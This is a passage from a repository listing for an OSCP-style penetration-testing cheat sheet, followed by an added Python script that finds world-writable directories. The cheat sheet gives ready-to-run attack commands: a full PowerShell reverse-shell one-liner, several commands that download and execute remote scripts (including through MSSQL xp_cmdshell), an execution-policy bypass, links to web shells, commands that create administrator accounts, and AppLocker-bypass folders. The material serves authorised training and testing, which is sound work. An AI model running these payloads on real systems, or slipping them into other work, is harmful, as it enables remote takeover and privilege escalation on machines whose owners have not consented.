-e php,html,js,txt,asp,aspx,jsp,bak -t 50`\n\nHTTP\n`gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69`\n\nHTTPS\n`gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69`\n(`-k` skips TLS certificate verification; `--wildcard` is unrelated and is what you add when gobuster stops because the server answers every path with the same response)\n\nNikto\n`nikto -h 10.10.10.10 -p 80`\n\nNikto HTTPS\n`nikto -h 10.10.10.10 -p 443 -ssl`\n\nWFuzz\n`wfuzz -u http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00 -w /usr/share/wfuzz/wordlist/general/common.txt`\n(the trailing `%00` null byte only truncates the path on PHP older than 5.3.4; against newer PHP drop it)\n\n## Web Shells\n\n-   https://github.com/Arrexel/phpbash\n-   https://github.com/flozz/p0wny-shell\n\n## WordPress\n\n-   https://forum.top-hat-sec.com/index.php?topic=5758.0\n\n## Windows Framework / Powershell\n\nbypass PowerShell execution policy\n\n-   Bypassing execution policy and executing a 
script:\n    `powershell -ExecutionPolicy ByPass -File script.ps1`\n\n---\n\n-   https://github.com/samratashok/nishang\n-   https://github.com/rasta-mouse/Sherlock\n-   Reverse PowerShell one-liner. Run it from cmd.exe: from an existing PowerShell prompt the `$` variables inside the double quotes would expand before the child process sees them, so use single quotes there. Sometimes `powershell` or `echo` needs to be in front of the string and sometimes quotes are needed, e.g. `powershell IEX ...`, `powershell \"IEX ...\"` or `echo IEX ...`.\n\n```\npowershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '\u003e ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n```\n\n-   If one has a Command Prompt shell, this will grab PowerUp from a local web server and run it on the compromised shell:\n\n```\necho IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1') | powershell -noprofile -\n```\n\n-   The same from an existing PowerShell session:\n\n```\nIEX(New-object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1')\n```\n\n-   Download a script and immediately call a function it defines (the `IEX` must wrap the download, otherwise the script text is only printed and the function never exists):\n\n```\npowershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.x/Whatever.ps1'); Invoke-Whatever\"\n```\n\n-   Reverse PowerShell using mssql (inside T-SQL the command is single-quoted, so single quotes within it are doubled):\n\n```\nEXEC master..xp_cmdshell 'powershell -c \"IEX(New-Object Net.WebClient).DownloadString(''http://10.10.10.10/Nishang-ReverseShell.ps1'')\"'\n```\n\n-   File transfer with PowerShell (`DownloadFile` returns nothing, so there is nothing to `IEX`):\n\n```\npowershell -c \"(New-Object Net.WebClient).DownloadFile('http://server/path/to/file', 'nameforfile')\"\n```\n\n## Windows Post Exploitation Commands\n\n-   WMIC USERACCOUNT LIST BRIEF\n-   net user\n-   net localgroup Users\n-   net localgroup Administrators\n-   net user USERNAME NEWPASS /add\n-   net user \"USER NAME\" NEWPASS /add\n-   net localgroup administrators USERNAME 
/add\n\nWriteable Directories\n\n# Windows\n\n---\n\nlist from https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md\nThe following folders are by default writable by normal users (depends on Windows version - this is from W10 1803). Confirm on the target with `icacls \u003cpath\u003e` before relying on one.\n\n```\nC:\\Windows\\Tasks\nC:\\Windows\\Temp\nC:\\windows\\tracing\nC:\\Windows\\Registration\\CRMLog\nC:\\Windows\\System32\\FxsTmp\nC:\\Windows\\System32\\com\\dmp\nC:\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\nC:\\Windows\\System32\\spool\\PRINTERS\nC:\\Windows\\System32\\spool\\SERVERS\nC:\\Windows\\System32\\spool\\drivers\\color\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\nC:\\Windows\\System32\\Tasks_Migrated (after performing a version upgrade of Windows 10)\nC:\\Windows\\SysWOW64\\FxsTmp\nC:\\Windows\\SysWOW64\\com\\dmp\nC:\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\nC:\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\n```\n\n# Linux\n\nTo find World Writeable Directories in Linux use the command (`-xdev` stays on the starting filesystem; the sticky-bit exclusion drops /tmp-style directories where you can create files but not replace other users'):\n`find / -xdev -type d \\( -perm -0002 -a ! 
-perm -1000 \\) -print`\n\n## Todo List:\n\n-   Improve the readability of the cheatsheet\n-   Fill in the empty sections\n-   Remove unnecessary sections\n-   Integrate the files in the repo into the cheatsheet\n-   Migrate to GitBook\n-   Include screenshots/gifs into the cheatsheet if needed\n-   Add a Table of Contents similar to PayloadAllTheThings' repos\n\n## Thank you:\n\n# Thanks to these people for including my cheatsheet on their website/blog:\n\n-   https://khaoticdev.net/cheatsheets/#collections\n-   https://www.facebook.com/ncybersec/posts/1541830509321001\n-   https://www.facebook.com/cyberg0100/posts/github-sinfulzjusttryharder-justtryharder-a-cheat-sheet-which-will-aid-you-throu/653235345249466\n-   https://www.reddit.com/r/CyberSpaceVN/comments/f3n2wp/github_sinfulzjusttryharder_justtryharder_a_cheat\n-   https://xn4k.github.io/pentest/PWK-course-\u0026-the-OSCP-Exam-Cheatsheet/\n-   https://opensourcelibs.com/libs/pentesting-tools\n-   https://gitmemory.com/brhannah\n-   https://www.bugbountytips.tech/2020/08/23/justtryharderpwk-cheatsheetkali-linux-cheatsheethydra-cheatsheetsecu-2/\n-   https://pythonlang.dev/category/oscp/\n","funding_links":[],"categories":["Python","Python (1887)","Resources"],"sub_categories":["Training and Certifications"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsinfulz%2FJustTryHarder","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsinfulz%2FJustTryHarder","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsinfulz%2FJustTryHarder/lists"}
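The `find` one-liner from the Linux Writeable Directories section, redone as an added Python example that is not part of this repository: it applies the same three tests (is a directory, other-writable, not sticky) and the `-xdev` filesystem boundary, which helps when `find` is missing or restricted on the target or when you want the hits inside a script. The temporary tree built in `demo()` is constructed for illustration and all function names are my own.

```python
"""Python equivalent of: find / -xdev -type d \\( -perm -0002 -a ! -perm -1000 \\) -print"""
import os
import shutil
import stat
import tempfile
from typing import List


def is_world_writable_dir(st: os.stat_result) -> bool:
    """The three tests of the find expression: a directory, other-writable, and not sticky.

    The sticky bit (1777, like /tmp) lets anyone create files but only owners delete or rename
    them, so such directories are far less useful for replacing something root runs.
    """
    return (stat.S_ISDIR(st.st_mode)
            and bool(st.st_mode & stat.S_IWOTH)
            and not (st.st_mode & stat.S_ISVTX))


def world_writable_dirs(root: str, same_fs: bool = True) -> List[str]:
    """Walk root and return every directory matching is_world_writable_dir, sorted.

    same_fs mirrors -xdev: do not cross into other mounts (/proc, /sys, network shares).
    Symlinks are never followed, matching find's default behaviour.
    """
    root_st = os.lstat(root)
    hits = [root] if is_world_writable_dir(root_st) else []
    for dirpath, dirnames, _ in os.walk(root):  # followlinks=False by default
        keep = []
        for name in dirnames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:  # vanished or unreadable: find prints an error and moves on
                continue
            if not stat.S_ISDIR(st.st_mode):  # symlink to a directory: listed by walk, not a real dir
                continue
            if same_fs and st.st_dev != root_st.st_dev:
                continue
            keep.append(name)
            if is_world_writable_dir(st):
                hits.append(path)
        dirnames[:] = keep  # prune what we skipped so walk does not descend into it
    return sorted(hits)


def demo() -> List[str]:
    """Constructed tree: the two 0777 directories are reported; the 1777 (sticky) and 0755 ones are not."""
    base = tempfile.mkdtemp()
    try:
        layout = {
            "open_dir": 0o777,
            "sticky_dir": 0o1777,
            "safe_dir": 0o755,
            "nested": 0o755,
            "nested/open2": 0o777,
        }
        for rel, mode in layout.items():
            path = os.path.join(base, rel)
            os.makedirs(path, exist_ok=True)
            os.chmod(path, mode)  # chmod is not subject to the umask
        return [os.path.relpath(p, base) for p in world_writable_dirs(base)]
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for d in demo():
        print(d)
```

Run it as `python3 wwdirs.py` to see the constructed result, or call `world_writable_dirs("/")` on a real host; expect it to be slow on large trees for the same reason `find /` is.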